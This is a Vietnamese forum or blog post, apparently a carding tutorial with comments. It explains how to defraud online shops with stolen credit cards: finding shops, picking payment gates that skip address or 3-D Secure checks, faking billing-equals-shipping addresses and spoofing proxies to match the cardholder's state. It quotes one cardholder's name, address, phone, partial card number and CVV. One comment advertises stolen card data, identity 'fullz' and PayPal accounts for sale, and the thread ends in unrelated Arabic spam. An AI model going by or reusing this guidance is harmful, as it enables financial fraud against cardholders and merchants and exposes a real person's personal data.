B1- VÀO GOOGLE.COM TÌM DORK: CLOTHINGS, HANDBAG, STORE WORLDWIDE
Công thức : Mã:
Tên món hàng + Store or shop +worldwide
*HOẶC CÓ THỂ TÌM NHỮNG THỨ LIÊN QUAN. VÍ DỤ NHƯ TÌM ZIPPO ĐỪNG TÌM ZIPPO SHOP MÀ MÌNH SẼ TÌM MẤY SITE BÁN QUÂN PHỤC, ĐỒ QUÂN ĐỘI, SHOP BÀN ĐỒ ĐI PICNIC, SHOP DAO KÉO ĐỒ LÀM BẾP, CHỨ SHOP BAO CAO SU KHÔNG CÓ ZIPPO ĐÂU NHÉ
B2- KHI ĐÃ HIỆN CÁC KẾT QUẢ TÌM KIẾM VIỆC TIẾP THEO KÉO XUỐNG CUỐI TÌM GATE THANH TOÁN THEO KINH NGHIỆM CỦA MÌNH:
- Gate Yahoo check AVS cái này khó ped mình ped dc mỗi 1 lần.
*Thích hợp chơi B#S
- Gate mcafeesecure cái này live đủ $ là qua không check AVS
*Thích hợp chơi B#S B=S
- Gate Authorize.net gate này Check AVS live + đủ BL là qua.
*Thích hợp chơi B#S
- Sega pay gate chủ yếu của mấy site UK gate này có 2 loại:
*Loại 1 không cần VBV sẽ như này
*Loại 2 cần VBV sẽ như này:
*Thích hợp chơi B#S B=S
B3: LỰA CHỌN SHIPPING.
ĐỐI VỚI SITE US THEO MÌNH NÊN CHỌN USPS TAX NHẸ. GỬI HÀNG CÀNG CHẬM CÀNG ÍT MẤT TAX
SITE UK = ROYAL MAIL.
--------------------------------
BƯỚC CUỐI CÙNG THÌ CÁC BÁC KẾT HỢP LÀM SAO. FIND DC SITE --> QUA DC GATE --> SHIPPED DC --> FREE TAX HOẶC GIẢM THIỂU TAX
Quote:
WACHOVIA BANK, N.A. DEBIT CLASSIC
Bin = Ship ( Billing Information = Shipping Information ) : ở đây có nghĩa là dùng chính địa chỉ người nhận hàng làm địa chỉ thanh toán .
Ví Dụ : Tôi có 1 con CC như sau :
Quote:
Heather | burnette | 385 e.beal st. | Highland Springs | Virginia | 23075 | 8043221052 | US | 51515800402xxxxx | 01 | 2011 | 573
ở đây địa chỉ thanh toán đúng phải là :
Quote:
| 385 e.beal st. | Highland Springs | Virginia | 23075 |
Nhưng chúng ta sẽ fake địa chỉ này bằng chính địa chỉ người nhận . trong khi đó vẫn giữ nguyên tên và ccnumber vẫn là của con CC
Phương pháp này thì tùy 1 số Shop mới làm được chứ không phải 100% shop nào cũng làm được đâu nhé
Bin # Ship ( Billing Information # Shipping Information ) : Quá đơn giản và dễ hiểu rồi ... cái này thì mình ship như bình thường thôi . Điền illing Information ( của cc ) và Shipping Information ( của drop ) .
Sock = state : Khi đi ship hàng thì việc đầu tiên của chung ta là fake sock đúng không ? Sock = state có nghĩa là bạn phải fake IP thành state của con CC
Ví Dụ : ở con CC
Quote:
Heather | burnette | 385 e.beal st. | Highland Springs | Virginia | 23075 | 8043221052 | US | 51515800402xxxxx | 01 | 2011 | 573
Thì State của nó là :
Quote:
Virginia
Thì Các bạn phải fake sock state Virginia thôi
Sock US : đơn giản quá rồi miễn là sock us thôi . chẳng có gì rằng buộc cả
II . Kinh Nghiệm Ship Hàng
- Việc ship hàng có thành công hay không thành công dựa vào rất nhiều yếu tố gây nên . nhưng tôi xin đưa ra 1 số kinh nghiệm để giảm thiểu việc ship không thành công .
thứ 1 : Bạn phải đảm bảo rằng CC của bạn live và đủ tiền với món đồ bạn định ship . nếu bạn nào có thể check blance trưóc thì càng tốt . 1 số bạn thì dựa vào địa chỉ nhà ở của con cc mà đoán trước ... cũng có phần phải thôi . Nôm na ra thì nhà ở Phố lớn , phố to phải có nhiều tiền hơn mấy đứa nhà ở ổ chuột rồi
Thứ 2 : Bank chia CC ra rất nhiều loại . như debit card , bussines ... tùy vào từng loại mà các bạn sử dụng . 1 con CC thuộc loại thẻ ghi nợ thì cũng có thể ship món đồ 1000$ , 2000$ nhưng cũng phải xem bank nó có giới hạn ở mức độ nào ( để biết thì các bạn phải test đi test lại nhiều lần và tùy với shop mà sử dụng loại gì ) . Hay các bạn sử dụng 1 con cc thuộc dạng trả trước ... trong CC có 100$ mà các bạn đòi ship tới 300$ , 500$ thì thành công sao được . Đó cũng là nguyên nhân tôi đã nói ở kinh nghiệm thứ 1 . Hay bank có chịu changer tiền ngay hay không hay là nó hold vài ngày rồi mới changer ... ( những cái này thì đều do bạn test hoặc học hỏi kinh nghiệm ở các bro đi trước mà thôi )
Thứ 3 : Sock của bạn . Tùy vào từng shop mà chúng ta phải rút ra kinh nghiệm rằng shop này có thể dùng sock us được hay không ? Hay phải sử dụng Sock = state CC ! để có thể biết được điều này thì đối với shop mới các bạn phải test , hoặc ở 1 số tut khi mọi người đã post thì các bạn nên làm theo cách của chủ tut post k0 nên biến tấu nếu k0 hiểu rõ . Và ở 1 số shop thì nó còn kiểm tra xem sock có Bị blacklist hay không
Thứ 4 : Mình muốn nhắc tới tâm lý ship hàng , 1 số shop nó tính Trung bình thời gian 1 người có thể ship thành công 1 món đồ ( time out ) . Để tránh 1 số trường hợp các bác shiper nhà ta cầm cc , sock vào đâm đầu check out ... Chúng ta hãy mang 1 tâm lý là người chủ thẻ đi mua đồ chứ đừng có hầm hầm vào hãm hiếp ... ít nhất khi vào 1 shop cũng phải vào xem món này món nọ chứ có mấy ai vừa vào chả xem cái gì tự nhiên mua luôn đâu ? ( 1 số bro vẫn làm vậy nhưng không biết là có thủ thuật gì hay là do paygate của shop nó không kĩ tính và mình nói ở khía cạnh mua online nhé không lại có bro nào vặn vẹo bảo mua ngoài đời vẫn thế )
LenoPark-DF
B1- VÀO GOOGLE.COM TÌM DORK: CLOTHINGS, HANDBAG, STORE WORLDWIDE
Công thức : Mã:
Tên món hàng + Store or shop +worldwide
*HOẶC CÓ THỂ TÌM NHỮNG THỨ LIÊN QUAN. VÍ DỤ NHƯ TÌM ZIPPO ĐỪNG TÌM ZIPPO SHOP MÀ MÌNH SẼ TÌM MẤY SITE BÁN QUÂN PHỤC, ĐỒ QUÂN ĐỘI, SHOP BÀN ĐỒ ĐI PICNIC, SHOP DAO KÉO ĐỒ LÀM BẾP, CHỨ SHOP BAO CAO SU KHÔNG CÓ ZIPPO ĐÂU NHÉ
B2- KHI ĐÃ HIỆN CÁC KẾT QUẢ TÌM KIẾM VIỆC TIẾP THEO KÉO XUỐNG CUỐI TÌM GATE THANH TOÁN THEO KINH NGHIỆM CỦA MÌNH:
- Gate Yahoo check AVS cái này khó ped mình ped dc mỗi 1 lần.
*Thích hợp chơi B#S
- Gate mcafeesecure cái này live đủ $ là qua không check AVS
*Thích hợp chơi B#S B=S
- Gate Authorize.net gate này Check AVS live + đủ BL là qua.
*Thích hợp chơi B#S
- Sega pay gate chủ yếu của mấy site UK gate này có 2 loại:
*Loại 1 không cần VBV sẽ như này
*Loại 2 cần VBV sẽ như này:
*Thích hợp chơi B#S B=S
B3: LỰA CHỌN SHIPPING.
ĐỐI VỚI SITE US THEO MÌNH NÊN CHỌN USPS TAX NHẸ. GỬI HÀNG CÀNG CHẬM CÀNG ÍT MẤT TAX
SITE UK = ROYAL MAIL.
--------------------------------
BƯỚC CUỐI CÙNG THÌ CÁC BÁC KẾT HỢP LÀM SAO. FIND DC SITE --> QUA DC GATE --> SHIPPED DC --> FREE TAX HOẶC GIẢM THIỂU TAX
*Sell CVV, CCN, CCV Full Info,...
Trả lờiXóa- US (visa,master) = 10$ ( Mua sl> 20 cái 8$/c) (50-100$)
- US (Amex,Dis) = 15$ ( Mua sl> 20 cái 12$/c) (50-100$)
- US Bin, Dob = 20$ ( Mua sl> 10 cái 18$/c) (50-100$)
=> US fullz info = 50$ ( Mua sl> 10 cái 45$/c) (400-600$)
- UK (visa,master) = 15$
- UK (Amex,Dis) = 25$
- UK Bin, Dob = 25$
=> UK fullz = 55$
- CA (visa,master) = 15$
- CA (Amex,Dis) = 20$
- CA Bin, Dob = 20$
=> CA fullz = 55$
- AU (visa,master) = 20$
- AU (Amex,Dis) = 20$
- AU Bin, Dob = 25$
*Sell PAYPAL VERIFIED ACCOUNT US UK CA EU:
Paypal Verified Balance 2500$ = 205$
Paypal Verified Balance 4000$ = 355$
Paypal Verified Balance 6000$ = 605$
Paypal Verified Balance 7000$ = 655$
Paypal Verified Balance 8000$ = 755$
=========--->My work is online 24/24<---=========
*Sell 1TB One Drive
- 10$/Account/1TB
=> Contact me <=
ICQ:721391003
có tuyển đệ tử ko bạn ơi :(
Trả lờiXóaسعر متر الحجر الهاشمي في مصر 2020
Trả lờiXóaاسعار الحجر الابيض الازازي في مصر 2020
اسعار الحجرالهاشمي الراس بمصر2023
اسعارالحجرالفرعوني 2020
سعرحجرهاشمي هيصم
اسعار الحجر الهاشمي في مصر 2020
حجر هاشمي سعر الحجر الهاشمي اسعار الحجر الهاشمي
اسعار تركيب حجر هاشمي 2020
اسعار الحجر الفرعوني
سعر متر الحجر الفرعوني